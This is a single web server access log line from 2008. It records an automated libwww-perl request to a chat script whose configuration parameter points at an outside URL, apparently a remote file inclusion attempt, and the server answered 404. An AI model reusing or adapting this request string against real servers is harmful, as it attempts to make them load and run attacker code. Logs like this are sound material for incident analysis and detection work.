201.116.50.181 - - [14/Jul/2008:22:30:44 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
